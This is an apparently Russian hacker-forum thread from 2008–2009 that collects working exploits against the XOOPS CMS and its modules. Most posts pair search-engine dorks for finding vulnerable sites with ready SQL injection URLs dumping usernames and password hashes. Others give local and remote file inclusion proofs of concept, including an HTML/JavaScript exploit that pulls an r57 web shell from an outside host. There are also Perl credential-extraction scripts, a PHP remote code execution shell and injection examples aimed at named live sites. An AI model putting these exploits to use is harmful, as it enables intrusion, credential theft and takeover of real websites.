Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
[Обзор уязвимости] Xoops и его модулей. |
15.03.2008, 04:33
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
[Обзор уязвимости] Xoops и его модулей.
XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability
DORKS 1 : allinurl :"/modules/tutorials/"
DORK 2 : allinurl :"/modules/tutorials/"tid
EXPLOIT 1 :
PHP код:
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/*
EXPLOIT 2 :
PHP код:
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*
================================================
XOOPS Module My_eGallery 3.04 (gid) SQL Injection Vulnerability
DORKS 1 : allinurl :"modules/my_egallery"
EXPLOIT :
PHP код:
modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*
================================================
XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability
DORKS 1 : allinurl :"modules/gallery"
DORK 2 : allinurl :"modules/gallery"gid
EXPLOIT :
PHP код:
modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*
================================================
XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability
DORK 1 : allinurl: "modules/wfdownloads/viewcat.php?cid"
DORK 2 : allinurl: "modules/wfdownloads"
EXPLOIT :
PHP код:
modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass
================================================
XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerabilit
DORK 1 : allinurl: "modules/glossaires"
EXPLOIT :
PHP код:
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
================================================
PS найденные за март 2008
Последний раз редактировалось xcedz; 15.03.2008 в 04:39..
|
|
|
15.03.2008, 16:26
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
LFI
Vulnerable: XOOPS 2.0.18
Уязвимый скрипт: htdocs/install/index.php
PHP код:
$language = 'english';
if ( !empty($_POST['lang']) ) {
$language = $_POST['lang'];
.
.
.
.
if ( file_exists("./language/".$language."/install.php") ) {
include_once "./language/".$language."/install.php";
POST-переменная "lang" не фильтруется
PoC:
Код:
POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
Content-Length: 67
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php
lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next
URL Redirection
Vulnerable: XOOPS 2.0.18
Уязвимый скрипт: htdocs/user.php?xoops_redirect
POST-переменная "xoops_redirect" не фильтруется
PoC:
Код:
http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com
|
|
|
|
17.03.2008, 18:57
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
DORK 1 : allinurl: "modules/dictionary"
DORK 2 : allinurl: "modules/dictionary/print.php?id"
EXPLOIT :
Код HTML:
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
|
|
|
|
19.03.2008, 21:50
|
|
Познающий
Регистрация: 01.01.2008
Сообщений: 91
Провел на форуме:
994508
Репутация:
143
|
|
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
Код:
##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################
# milw0rm.com [2008-03-17]
milw0rm.com |
|
|
|
XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability |
22.03.2008, 13:10
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability
SQL Injection
Vulnerable: XOOPS Project-Recette(Recipe)2.2
Exploit:
Код:
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
Dork:
Код:
allinurl :\"modules/recipe\"
|
|
|
|
23.03.2008, 15:30
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
RFI
Vulnerable: XOOPS Module XFsection
Vuln script: modify.php
PoC:
Код:
http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
Vulnerable: XOOPS Module XT-Conteudo
Vuln script: /admin/spaw/spaw_control.class.php
PHP код:
include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';
PoC:
Код:
http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?
Vulnerable: XOOPS Module Cjay Content 3
Vuln script: /admin/editor2/spaw_control.class.php
PHP код:
include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';
Note: Register globals must be ON, and Magic Quotes must be OFF
PoC:
Код:
http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]?
Vulnerable: XOOPS Module icontent 1.0
Exploit:
Код HTML:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1254">
<title>XOOPS Module icontent v.1.0 Remote File Inclusion
Exploit</title>
<script language="JavaScript">
//'===============================================================================================
//'[Script Name: XOOPS Module icontent v.1.0
//'[Author : Mahmood_ali
//'[S.Page :
http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip
//'===============================================================================================
//'[[V.Code]]------------------------------------------------------
//'
//'include $spaw_root.'config/spaw_control.config.php';
//'include $spaw_root.'class/toolbars.class.php';
//'include $spaw_root.'class/lang.class.php';
//'
//'[[V.Code]]---------------------------------------------------------
//# Tryag.Com
//# ...
var path="/modules/icontent/include/wysiwyg/"
var adres="spaw_control.class.php" //File name
var acik ="?spaw_root=" // Line 15
var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell
function command(){
if (document.rfi.target1.value==""){
alert("Failed..");
return false;
}
rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
rfi.submit(); // Form Submit
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Arial" size="2"
color="#FFFFFF">XOOPS Module icontent
v.1.0 Remote File Inclusion Exploit</font></b></p>
<p></p>
<form method="post" target="getting"
name="rfi" onSubmit="command();">
<b><font face="Tahoma" size="1"
color="#FF0000">Target:</font><font
face="Tahoma" size="1"
color="#FFFF00">[http://[target]/[scriptpath]</font><font
color="#00FF00"
size="2" face="Tahoma">
</font><font color="#FF0000"
size="2"> </font></b>
<input type="text" name="target1"
size="20" style="background-color:
#808000"
onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Gonder"
name="B1"><input type="reset"
value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337"
width="633" scrolling="yes"
frameborder="0"></iframe>
</p>
<b><font face="Lucida Handwriting" size="5"
color="#FF0000">Mahmood_ali</font></b><p>
<b><a href="http://tryag.com/cc">
<font face="Lucida Handwriting" size="5"
color="#FFFFFF">TrYaG-Team</font></a></b></p>
</p>
</center>
</body>
</html>
Vulnerable: XOOPS Module tsdisplay4xoops 0.1
PoC:
Код:
[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell
Remote SQL Injection
Vulnerable: XOOPS Module Jobs <= 2.4
Код:
#!/usr/bin/perl
#[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL
Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[Dork : "inurl:/modules/jobs/"
#[S.Page : http://www.jlmzone.com/
#[$$ : Free
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$kapan = "/*";
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/modules/jobs/index.php?pa=jobsview&cid=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = <STDIN>;
chop ($id);
$target =
"-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;
#Writing data to socket
print
"+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /password:(.*?)<\/b>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit();
}
}
|
|
|
|
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it |
26.06.2008, 18:42
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
PHP код:
#############################################
#Coded By Cr@zy_King http://coderx.org]#
#############################################
use IO::Socket;
if (@ARGV != 3)
{
print "\n-----------------------------------\n";
print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
print "-----------------------------------\n";
print "\n4ever Cra\n";
print "crazy_kinq[at]hotmail.co.uk\n";
print "http://coderx.org\n";
print "\n-----------------------------------\n";
print "\nKullanim: $0 <server> <path> <uid>\n";
print "Ornek: $0 www.victim.com /path 1\n";
print "\n-----------------------------------\n";
exit ();
}
$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort =>
"80");
printf $socket ("GET
%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/*
HTTP/1.0\nHost: %s\nAccept: */*\nConnection:
close\n\n",
$path,$server,$uid);
while(<$socket>)
{
if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}
# Cr@zy_King
# http://coderx.org
# crazy_kinq@hotmail.co.uk
|
|
|
|
12.05.2009, 02:12
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
Solide Snake, не разу на blind не натыкался.
xoops # Article Module # sql injection
Код:
modules/articles/article.php?id={SQL}--
+xoops_users
-uname
-pass
example:
Код:
http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_users+limit+0,1--
mega exploit  :
Код:
#!usr/bin/perl
use LWP::UserAgent;
print qq(
# xoops article module exploit #
# coded by ph1l1ster #\n\n# Enter site:\n> );
$site = <STDIN>;chomp($site);
print "\n# Enter numbers of users:\n> ";
$users = <STDIN>;chomp($users);
&inj;
sub inj{
print "\nStarting..\n\n";
$limit = 0;
while ($limit <= $users){
$url = "http://".$site."/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(555666,0x3a,uname,0x3a,pass,0x3a,777888),8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users+limit+".$limit.",1--";
$client = LWP::UserAgent->new( ) or die;
$answer = $client->get($url);
$limit ++;
if ($answer->content =~ /555666:(.*):777888/){
print $1."\n";}}
print "Done!"}
|
|
|
|
03.09.2009, 09:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
XOOPS modules/easyweb/
SQL-inj
Exploit
Код:
-555555+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--
http://ofernio.ru/portal/modules/easyweb/?artid=-5+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+ from+xoops_users--
dOrK: inurl:/modules/easyweb/
Последний раз редактировалось HAXTA4OK; 03.09.2009 в 09:56..
|
|
|
|
09.11.2009, 12:43
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
Код:
#!/usr/bin/php -q
<?php
/****************************************************************
* XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit *
* by athos - staker[at]hotmail[dot]it *
* http://xoops.org *
* *
* thanks to s3rg3770 and The:Paradox *
* *
* works with register globals on *
* note: this vuln is a remote php code execution *
* *
* Directory (xoops_lib/modules/protector/) *
* onupdate.php?mydirname=a(){} [PHP CODE] function v *
* oninstall.php?mydirname=a(){} [PHP CODE] function v *
* notification.php?mydirname=a(){} [PHP CODE] function v *
****************************************************************/
error_reporting(0);
list($cli,$host,$path,$num) = $argv;
if ($argc != 4) {
print "\n+--------------------------------------------------------------+\n";
print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |\n";
print "\r+--------------------------------------------------------------+\n";
print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";
print "\rUsage: php xpl.php [host] [path]\n\n";
print "\rhost + localhost\n";
print "\rpath + /XOOPS\n";
exit;
}
exploit();
function exploit() {
global $num;
if ($num > 3) {
die("\n$num isn't a valid option\n");
}
else {
yeat_shell();
}
}
function yeat_shell() {
while (1) {
echo "yeat[php-shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));
if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");
print data_exec($exec);
}
}
function data_exec($exec) {
global $host,$path,$num;
if ($num == 1) {
$urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
}
if ($num == 2) {
$urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
}
if ($num == 3) {
$urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
}
$exec = urlencode($exec);
$data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";
$html = data_send ($host,$data);
return $html;
}
function data_send ($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!\n");
} fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
(c)milw0rm.com
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
Похожие темы
Линейный вид
